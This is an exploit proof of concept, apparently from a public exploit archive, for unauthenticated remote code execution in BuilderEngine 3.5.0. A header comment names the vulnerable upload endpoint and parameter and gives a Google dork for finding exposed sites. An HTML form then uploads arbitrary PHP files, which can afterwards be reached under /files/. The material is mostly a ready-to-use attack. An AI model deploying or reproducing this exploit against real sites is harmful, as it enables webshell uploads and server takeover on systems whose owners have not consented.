27 lines
No EOL
843 B
PHP
27 lines
No EOL
843 B
PHP
<!--
|
|
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
|
|
# Date: 18/09/2016
|
|
# Exploit Author: metanubix
|
|
# Vendor Homepage: http://builderengine.org/
|
|
# Software Link: http://builderengine.org/page-cms-download.html
|
|
# Version: 3.5.0
|
|
# Tested on: Kali Linux 2.0 64 bit
|
|
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
|
|
|
|
1) Unauthenticated Unrestricted File Upload:
|
|
|
|
POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
|
|
|
|
Vulnerable Parameter: files[]
|
|
|
|
We can upload test.php and reach the file via the following link:
|
|
/files/test.php
|
|
-->
|
|
<html>
|
|
<body>
|
|
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
|
|
<input type="file" name="files[]" />
|
|
<input type="submit" value="send" />
|
|
</form>
|
|
</body>
|
|
</html> |